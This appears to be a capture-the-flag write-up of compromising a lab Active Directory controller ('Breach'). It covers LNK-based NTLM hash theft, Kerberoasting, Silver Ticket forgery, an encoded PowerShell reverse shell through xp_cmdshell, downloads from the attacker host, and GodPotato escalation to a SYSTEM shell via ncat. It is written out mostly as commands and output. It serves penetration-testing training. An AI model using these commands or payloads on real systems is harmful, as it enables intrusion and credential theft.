Initial Access#

Nmap Scan#

I began the assessment with a comprehensive Nmap scan to identify open ports and running services on the target domain controller:

1
└─$ nmap -p- -sV -vv --min-rate=3000 -oN breach.txt 10.129.12.240
2

3
# Nmap 7.95 scan initiated Mon Dec 15 09:13:21 2025 as: /usr/lib/nmap/nmap --privileged -p- -sV -vv --min-rate=3000 -oN breach.txt 10.129.12.240
4
Nmap scan report for 10.129.12.240
5
Host is up, received echo-reply ttl 127 (0.18s latency).
6
Scanned at 2025-12-15 09:13:21 +01 for 151s
7
Not shown: 65517 filtered tcp ports (no-response)
8
PORT      STATE SERVICE       REASON          VERSION
9
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
10
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
11
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
12
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
13
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
14
445/tcp   open  microsoft-ds? syn-ack ttl 127
15
464/tcp   open  kpasswd5?     syn-ack ttl 127
16
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
17
636/tcp   open  tcpwrapped    syn-ack ttl 127
18
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000
19
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
20
3269/tcp  open  tcpwrapped    syn-ack ttl 127
21
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
22
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
23
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
24
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
25
49677/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
26
49917/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
27
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
28

29
Read data files from: /usr/share/nmap
30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
31
# Nmap done at Mon Dec 15 09:15:52 2025 -- 1 IP address (1 host up) scanned in 151.30 seconds

The scan revealed a Windows Server 2022 domain controller (BREACHDC) with typical Active Directory services including DNS (53), LDAP (389), Kerberos (464), SMB (445), MSSQL (1433), WinRM (5985), and RDP (3389).

Updating Hosts File#

To ensure proper name resolution for Kerberos authentication and other domain operations, I added the target to my local hosts file:

1
└─$ echo -e "10.129.12.240\tbreachdc.breach.vl\tbreach.vl\tbreachdc" | sudo tee -a /etc/hosts
2
10.129.12.240  breachdc.breach.vl  breach.vl  breachdc

SMB Enumeration with Guest Access#

I tested for guest authentication on the SMB service and confirmed that null authentication was enabled:

1
└─$ nxc smb  breach.vl -u "Guest" -p ""
2
SMB         10.129.12.240   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) (Null Auth:True)
3
SMB         10.129.12.240   445    BREACHDC         [+] breach.vl\Guest:

With guest access confirmed, I enumerated the available SMB shares to identify potential attack vectors:

1
└─$ nxc smb  breach.vl -u "Guest" -p "" --shares
2
SMB         10.129.15.151   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) (Null Auth:True)
3
SMB         10.129.15.151   445    BREACHDC         [+] breach.vl\Guest:
4
SMB         10.129.15.151   445    BREACHDC         [*] Enumerated shares
5
SMB         10.129.15.151   445    BREACHDC         Share           Permissions     Remark
6
SMB         10.129.15.151   445    BREACHDC         -----           -----------     ------
7
SMB         10.129.15.151   445    BREACHDC         ADMIN$                          Remote Admin
8
SMB         10.129.15.151   445    BREACHDC         C$                              Default share
9
SMB         10.129.15.151   445    BREACHDC         IPC$            READ            Remote IPC
10
SMB         10.129.15.151   445    BREACHDC         NETLOGON                        Logon server share
11
SMB         10.129.15.151   445    BREACHDC         share           READ,WRITE
12
SMB         10.129.15.151   445    BREACHDC         SYSVOL                          Logon server share
13
SMB         10.129.15.151   445    BREACHDC         Users           READ

The enumeration revealed a critical misconfiguration: the “share” folder allows both READ and WRITE access to guest users. This is a significant finding as it opens up possibilities for credential theft attacks.

I connected to the writable share to explore its contents and identify potential targets:

1
└─$ smbclient \\\\breach.vl\\share -U "Guest"
2
Password for [WORKGROUP\Guest]:
3
Try "help" to get a list of possible commands.
4
smb: \> ls
5
  .                                   D        0  Mon Dec 15 10:28:24 2025
6
  ..                                DHS        0  Tue Sep  9 11:35:32 2025
7
  finance                             D        0  Thu Feb 17 12:19:34 2022
8
  software                            D        0  Thu Feb 17 12:19:12 2022
9
  transfer                            D        0  Mon Sep  8 11:13:44 2025
10

11
    7863807 blocks of size 4096. 1505175 blocks available
12
smb: \> cd transfer
13
smb: \transfer\> ls
14
  .                                   D        0  Mon Sep  8 11:13:44 2025
15
  ..                                  D        0  Mon Dec 15 10:28:24 2025
16
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
17
  diana.pope                          D        0  Thu Feb 17 12:21:19 2022
18
  julia.wong                          D        0  Thu Apr 17 01:38:12 2025
19

20
    7863807 blocks of size 4096. 1505175 blocks available
21
smb: \transfer\> ls claire.pope
22
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
23

24
    7863807 blocks of size 4096. 1505175 blocks available
25
smb: \transfer\> cd claire.pope\
26
smb: \transfer\claire.pope\> ls
27
NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\*
28
smb: \transfer\claire.pope\> cd ..
29
smb: \transfer\> cd diana.pope\
30
smb: \transfer\diana.pope\> ls
31
NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\*
32
smb: \transfer\diana.pope\>

The share contained a transfer folder with user directories (claire.pope, diana.pope, julia.wong), though direct access to these folders was denied. The presence of user folders in a transfer share suggested this might be actively used by employees.

NTLM Hash Theft via Malicious LNK File#

Since I had write access to the share, I employed a red teaming technique using a malicious shortcut (.lnk) file. When a user browses the folder containing the shortcut, Windows automatically attempts to resolve the shortcut’s icon location, causing an outbound connection that leaks the user’s NTLM hash.

First, I started Responder to capture incoming NTLM authentication attempts:

1
└─$ sudo responder -I tun0

Then I used NetExec’s slinky module to generate and upload a malicious LNK file that points to my Responder listener:

1
└─$ nxc smb breach.vl -u "Guest" -p "" -M slinky -o NAME=test SERVER=10.10.14.77
2
SMB         10.129.12.240   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) (Null Auth:True)
3
SMB         10.129.12.240   445    BREACHDC         [+] breach.vl\Guest:
4
SMB         10.129.12.240   445    BREACHDC         [*] Enumerated shares
5
SMB         10.129.12.240   445    BREACHDC         Share           Permissions     Remark
6
SMB         10.129.12.240   445    BREACHDC         -----           -----------     ------
7
SMB         10.129.12.240   445    BREACHDC         ADMIN$                          Remote Admin
8
SMB         10.129.12.240   445    BREACHDC         C$                              Default share
9
SMB         10.129.12.240   445    BREACHDC         IPC$            READ            Remote IPC
10
SMB         10.129.12.240   445    BREACHDC         NETLOGON                        Logon server share
11
SMB         10.129.12.240   445    BREACHDC         share           READ,WRITE
12
SMB         10.129.12.240   445    BREACHDC         SYSVOL                          Logon server share
13
SMB         10.129.12.240   445    BREACHDC         Users           READ
14
SLINKY      10.129.12.240   445    BREACHDC         [+] Found writable share: share
15
SLINKY      10.129.12.240   445    BREACHDC         [+] Created LNK file on the share share

The module placed the shortcut on the root share folder. Since no credentials were captured there, I moved the LNK file to the transfer folder where user activity was more likely:

1
└─$ smbclient \\\\breach.vl\\share -U "Guest"
2
Try "help" to get a list of possible commands.
3
smb: \> ls
4
  .                                   D        0  Mon Dec 15 09:42:13 2025
5
  ..                                DHS        0  Tue Sep  9 11:35:32 2025
6
  finance                             D        0  Mon Dec 15 09:29:07 2025
7
  software                            D        0  Thu Feb 17 12:19:12 2022
8
  test.lnk                            A      945  Mon Dec 15 09:42:13 2025
9
  transfer                            D        0  Mon Dec 15 09:28:41 2025
10

11
    7863807 blocks of size 4096. 1518803 blocks available
12
smb: \> cd transfer\
13
smb: \transfer\> ls
14
  .                                   D        0  Mon Dec 15 09:28:41 2025
15
  ..                                  D        0  Mon Dec 15 09:42:13 2025
16
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
17
  diana.pope                          D        0  Thu Feb 17 12:21:19 2022
18
  important.lnk                       A       23  Mon Dec 15 09:28:41 2025
19
  julia.wong                          D        0  Thu Apr 17 01:38:12 2025
20

21
    7863807 blocks of size 4096. 1518547 blocks available
22
smb: \transfer\> put test.lnk
23
putting file test.lnk as \transfer\test.lnk (0.8 kb/s) (average 0.8 kb/s)
24
smb: \transfer\> exit

Capturing NTLM Hash#

Shortly after placing the malicious shortcut in the transfer folder, Responder captured the NTLMv2 hash of a user named Julia.Wong who browsed the share:

alt text

Cracking the NTLMv2 Hash#

I used John the Ripper with the default wordlist to crack the captured NTLMv2 hash:

1
└─$ john hash.txt
2
Using default input encoding: UTF-8
3
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
4
Will run 8 OpenMP threads
5
Proceeding with single, rules:Single
6
Press 'q' or Ctrl-C to abort, almost any other key for status
7
Almost done: Processing the remaining buffered candidate passwords, if any.
8
Proceeding with wordlist:/usr/share/john/password.lst
9
Computer1        (Julia.Wong)
10
1g 0:00:00:00 DONE 2/3 (2025-12-15 09:47) 3.125g/s 131937p/s 131937c/s 131937C/s sierra1..faithfaith
11
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
12
Session completed.

The password was successfully cracked: Julia.Wong:Computer1

Retrieving User Flag#

With valid credentials for Julia.Wong, I connected to the share and retrieved the user flag from her transfer folder:

1
└─$ smbclient \\\\breach.vl\\share -U "Julia.Wong%Computer1"
2
Try "help" to get a list of possible commands.
3
smb: \> cd transfer
4
smb: \transfer\> ls
5
  .                                   D        0  Mon Dec 15 09:43:47 2025
6
  ..                                  D        0  Mon Dec 15 09:53:15 2025
7
  claire.pope                         D        0  Thu Feb 17 12:21:35 2022
8
  diana.pope                          D        0  Thu Feb 17 12:21:19 2022
9
  important.lnk                       A       23  Mon Dec 15 09:28:41 2025
10
  julia.wong                          D        0  Thu Apr 17 01:38:12 2025
11
  test.lnk                            A      945  Mon Dec 15 09:43:47 2025
12

13
    7863807 blocks of size 4096. 1517491 blocks available
14
smb: \transfer\> cd julia.wong\
15
smb: \transfer\julia.wong\> ls
16
  .                                   D        0  Thu Apr 17 01:38:12 2025
17
  ..                                  D        0  Mon Dec 15 09:43:47 2025
18
  user.txt                            A       32  Thu Apr 17 01:38:22 2025
19

20
    7863807 blocks of size 4096. 1517491 blocks available
21
smb: \transfer\julia.wong\> cat user.txt
22
cat: command not found
23
smb: \transfer\julia.wong\> mget user.txt
24
Get file user.txt? yes
25
getting file \transfer\julia.wong\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

Privilege Escalation#

Domain User Enumeration#

With Julia.Wong’s credentials, I enumerated all domain users to identify potential targets for lateral movement:

1
└─$ nxc smb  breach.vl -u "Julia.Wong" -p "Computer1" --users
2
SMB         10.129.15.151   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False) (Null Auth:True)
3
SMB         10.129.15.151   445    BREACHDC         [+] breach.vl\Julia.Wong:Computer1
4
SMB         10.129.15.151   445    BREACHDC         -Username-                    -Last PW Set-       -BadPW- -Description-
5
SMB         10.129.15.151   445    BREACHDC         Administrator                 2025-09-08 08:21:20 0       Built-in account for administering the computer/domain
6
SMB         10.129.15.151   445    BREACHDC         Guest                         2022-02-17 13:36:50 0       Built-in account for guest access to the computer/domain
7
SMB         10.129.15.151   445    BREACHDC         krbtgt                        2022-02-17 10:04:57 0       Key Distribution Center Service Account
8
SMB         10.129.15.151   445    BREACHDC         Claire.Pope                   2022-02-17 10:36:11 0
9
SMB         10.129.15.151   445    BREACHDC         Julia.Wong                    2022-02-17 12:58:50 0
10
SMB         10.129.15.151   445    BREACHDC         Hilary.Reed                   2022-02-17 10:36:11 0
11
SMB         10.129.15.151   445    BREACHDC         Diana.Pope                    2022-02-17 10:36:11 0
12
SMB         10.129.15.151   445    BREACHDC         Jasmine.Price                 2022-02-17 10:36:11 0
13
SMB         10.129.15.151   445    BREACHDC         George.Williams               2022-02-17 10:36:11 0
14
SMB         10.129.15.151   445    BREACHDC         Lawrence.Kaur                 2022-02-17 10:36:12 0
15
SMB         10.129.15.151   445    BREACHDC         Jasmine.Slater                2022-02-17 10:36:12 0
16
SMB         10.129.15.151   445    BREACHDC         Hugh.Watts                    2022-02-17 10:36:12 0
17
SMB         10.129.15.151   445    BREACHDC         Christine.Bruce               2022-02-17 10:36:12 0
18
SMB         10.129.15.151   445    BREACHDC         svc_mssql                     2022-02-17 10:43:08 0
19
SMB         10.129.15.151   445    BREACHDC         [*] Enumerated 14 local users: BREACH

The enumeration revealed a service account named svc_mssql, which is a high-value target as service accounts often have SPNs registered, making them vulnerable to Kerberoasting attacks.

Kerberos Ticket Request#

I requested a TGT (Ticket Granting Ticket) for Julia.Wong to perform Kerberos-based attacks:

1
└─$ impacket-getTGT breach.vl/Julia.Wong:Computer1 -dc-ip breachdc.breach.vl
2
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies
3

4
[*] Saving ticket in Julia.Wong.ccache

I set the Kerberos credential cache environment variable to use the obtained ticket:

1
└─$ export KRB5CCNAME=Julia.Wong.ccache

Kerberoasting Attack#

Using the TGT, I enumerated Service Principal Names (SPNs) in the domain to identify Kerberoastable accounts:

1
└─$ impacket-GetUserSPNs breach.vl/julia.wong -k  -no-pass -dc-ip breachdc.breach.vl
2
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies
3

4
[*] Getting machine hostname
5
ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation
6
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
7
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 11:43:08.106169  2025-12-15 10:25:23.758809

The svc_mssql account has an SPN registered for the MSSQL service. I requested a TGS ticket for this service, which is encrypted with the service account’s password hash:

1
└─$ impacket-GetUserSPNs breach.vl/julia.wong -k  -no-pass -dc-ip breachdc.breach.vl -request
2
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies
3

4
[*] Getting machine hostname
5
ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation
6
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
7
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 11:43:08.106169  2025-12-15 10:25:23.758809
8

9
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$b04968a8c1b75ac84c7c258a8b2456fa$e8fefd68470b01cbd8d8c7a1c9f7f83b41d8a874931f534f85419473b4656885eea4bf5b19b5907011d730ff67273b13daea24745f8ea58ceca5a6638015d92188aaa8f4d4d3d7c0f837c8a14b9bc239c662ecc783a6169170185c6ab13d42e58661b8c9979a7a1ad6f019601497f9d6d755f15666a2efb27422fc75f403e81f18a532b3c23a0c390199ee72ba5d7cd1d1fb38ab59128f7a69e4ebc7dda7b60cd410822c9685f00cc7989e5add43d921124784114aa0757f6aa6932d76739789bcf4e8f5a0a381fb4ead790818f4f1a95580f687b18bb4cb467210054fc52f540b98a9e24b4ba0d2e9955f3b91dd52fbe7fb49a28d3e44a9b00862bf43acb07ee4309f68f3b1b6b8fe5593d1ef3b13603ce39732ca79a7cd76e36a4dafd6fee538a70d3317b5e7c6067b9cf7438075bf9096be16cb8fde1e6e3afbbc4bab651305e24cbc3a7e78ae2305da2f5165c0e56b9d3b4087041081c2b9e0bdcc516817125c01b94d2994dc74c7f752a2e6770530ca8818366075ae2b60108aa5bb7edd1633cc99d6e7744aaeb779eb5e4081a7bc69fcf7fdc68b7f6ea27a5e72a15c0f58495468cc37adf267984b45c36332d302600126f4d6d3b20945017bf1b7ece8d85dddaf1179b109e1a369ae6fe883d83cf4c884d18806b14354a91ae0da5c639e3b89476f5de0fda282b3e22fdfbb43d941cf888376862d823f8c0afda822b32fa383351600e38ddf73575f3dfbd1aed882762568caf314ed63c560719e6967ccb7c858d235cae5485099f3eeb271316b4fa4cdd36261ab34bcd21c1f4def3c6f183b64cf45144264602c82a5bdb04d7cfdc38c8d4e06b190fd08bbfdae1b0019e1a5487db40f2d3dce57373cc80a5afc8b4c1d9f12e5b1c275c66b470de5c65984b07e8f74449fbf4ea31c1d59f5b06663aed270c57958b434acd3974562e16fef2d063d898a8d20895db48892c3178aab7feac39652e79b1aaf1066007f47c0d9290b86990eaf9e6f141549c01621ad0e9a561aaca9e9f9a1c7eb158062ca54a48148dd5cda8980ac2132e143e28a69034f520bdcf55e4af172a64bd21f2247f15b125c5a833e61530e6fd800a8b9d3ae92030a014097db9c02944f8187535f8e3632fdb7f05b927bc1caa3381902a2fc7f8e9b780e2b2bc0591050c33401a38c94418067f382dd88db093e49fada7cefce181ea19d7d9ada0ad9b3c71995857c9582240492ddfc3ab8bb896a2623b9d9aeddff1eea400b756a7d137910a16952d52b64514a9c1cb7185b6ef95e510d2f584d27126d49ee6590196f7c3b916623f920dcde5864d25f1594ab4362a1ad89649b2fc8591ee502ed935c3aaa8eb2c2a8ac0fe00f4b79bd17cdb86bf642b584c298a3bb0e6deaa46abe0032401a48c5c191e49bd5a78cf2d30a2aedea2145f980d5cfd4c3ee35fc0f0ce63cd39796a546e9059dddf1227bad1ceba4976bf33362fb

Cracking the Kerberos TGS Hash#

I cracked the captured TGS hash using John the Ripper:

1
└─$ john svc_mssql.hash
2
Using default input encoding: UTF-8
3
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
4
Will run 8 OpenMP threads
5
Proceeding with single, rules:Single
6
Press 'q' or Ctrl-C to abort, almost any other key for status
7
Almost done: Processing the remaining buffered candidate passwords, if any.
8
Proceeding with wordlist:/usr/share/john/password.lst
9
Trustno1         (?)
10
1g 0:00:00:00 DONE 2/3 (2025-12-15 11:08) 25.00g/s 102400p/s 102400c/s 102400C/s ilovegod..Peter
11
Use the "--show" option to display all of the cracked passwords reliably
12
Session completed.

The password was successfully cracked: svc_mssql:Trustno1

Analyzing Service Account Privileges#

Using BloodHound, I discovered that the svc_mssql account has SQLAdmin execution privileges over the domain controller, which can be leveraged to gain elevated access:

alt text

Silver Ticket Attack#

To exploit the MSSQL service, I crafted a Silver Ticket. First, I generated the NT hash of the svc_mssql password:

1
└─$ python3 -c 'import hashlib,binascii; print(binascii.hexlify(hashlib.new("md4", "Trustno1".encode("utf-16le")).digest()).decode())'
2
69596c7aa1e8daee17f8e78870e25a5c

Using the NT hash and domain SID, I forged a Silver Ticket for the Administrator account targeting the MSSQL service:

1
└─$ impacket-ticketer -domain-sid "S-1-5-21-2330692793-3312915120-706255856" -spn "MSSQLSvc/breachdc.breach.vl" -nthash "69596c7aa1e8daee17f8e78870e25a5c" -domain breach.vl  -user-id 500   Administrator
2
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies
3

4
[*] Creating basic skeleton ticket and PAC Infos
5
[*] Customizing ticket for breach.vl/administrator
6
[*]   PAC_LOGON_INFO
7
[*]   PAC_CLIENT_INFO_TYPE
8
[*]   EncTicketPart
9
[*]   EncTGSRepPart
10
[*] Signing/Encrypting final ticket
11
[*]   PAC_SERVER_CHECKSUM
12
[*]   PAC_PRIVSVR_CHECKSUM
13
[*]   EncTicketPart
14
[*]   EncTGSRepPart
15
[*] Saving ticket in Administrator.ccache

I set the environment variable to use the forged Silver Ticket:

1
└─$ export KRB5CCNAME=Administrator.ccache

MSSQL Access and Command Execution#

Using the Silver Ticket, I connected to the MSSQL server as Administrator:

1
└─$ impacket-mssqlclient -k -no-pass  -windows-auth breachdc.breach.vl
2
Impacket v0.13.0.dev0+20250801.113918.849c74b7 - Copyright Fortra, LLC and its affiliated companies
3

4
[*] Encryption required, switching to TLS
5
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
6
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
7
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
8
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
9
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
10
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
11
[!] Press help for extra shell commands
12
SQL (BREACH\Administrator  dbo@master)> enable_xp_cmdshell
13
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
14
INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

I enabled xp_cmdshell to execute operating system commands through the SQL Server.

Reverse Shell via MSSQL#

I executed a PowerShell reverse shell payload through xp_cmdshell to gain an interactive shell on the target:

1
SQL (BREACH\Administrator  dbo@master)> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAxADMAIgAsADQANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

I received the connection on my netcat listener:

1
└─$ nc -lnvp 4443
2
listening on [any] 4443 ...
3
connect to [10.10.14.113] from (UNKNOWN) [10.129.15.151] 55060
4
pwd
5

6
Path
7
----
8
C:\Windows\system32

1
PS C:\Windows\system32> whoami /priv
2

3
PRIVILEGES INFORMATION
4
----------------------
5

6
Privilege Name                Description                               State
7
============================= ========================================= ========
8
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
9
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
10
SeMachineAccountPrivilege     Add workstations to domain                Disabled
11
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
12
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled
13
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
14
SeCreateGlobalPrivilege       Create global objects                     Enabled
15
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Token Impersonation Attack#

I enumerated the privileges of the current user and found SeImpersonatePrivilege enabled, which allows for token impersonation attacks to escalate to SYSTEM.

Exploiting SeImpersonatePrivilege with GodPotato#

I uploaded GodPotato and ncat to the target system to perform a potato-style privilege escalation:

1
PS C:\Windows\system32> cd ../../Users
2
PS C:\Users> cd svc*
3
PS C:\Users\svc_mssql> iwr http://10.10.14.113:8000/GodPotato-NET4.exe -outfile godpotato.exe
4
PS C:\Users\svc_mssql> iwr http://10.10.14.113:8000/ncat.exe -outfile ncat.exe
5
PS C:\Users\svc_mssql>

I executed GodPotato to run a reverse shell as SYSTEM:

1
PS C:\Users\svc_mssql> .\godpotato.exe -cmd "ncat.exe 10.10.14.113 4487 -e powershell"

SYSTEM Shell#

I received a connection on my listener with SYSTEM privileges:

1
└─$ nc -lnvp 4487
2
listening on [any] 4487 ...
3
connect to [10.10.14.113] from (UNKNOWN) [10.129.15.151] 55355
4

5
PS C:\Users\svc_mssql> whoami
6
nt authority\system
7
PS C:\Users\svc_mssql>

Retrieving Root Flag#

With SYSTEM access, I retrieved the root flag from the Administrator’s desktop:

1
PS C:\Users\svc_mssql> cat ../Administrator/Desktop/root.txt
2
cat ../Administrator/Desktop/root.txt
3
fc98f418f94f8cdb9a30ef026fe64345
4
PS C:\Users\svc_mssql>